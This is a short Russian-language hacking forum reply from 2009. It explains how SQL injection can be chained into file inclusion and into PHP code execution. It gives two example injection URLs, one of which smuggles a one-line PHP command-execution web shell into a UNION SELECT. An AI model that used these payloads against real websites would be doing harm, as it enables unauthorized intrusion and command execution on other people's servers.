05.05.2009, 22:31
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
С нами:
9296966
Репутация:
585
|
|
-m0rgan-
Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5
?
Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
Код:
http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls
Последний раз редактировалось cr0w; 05.05.2009 в 22:47..
|
|
|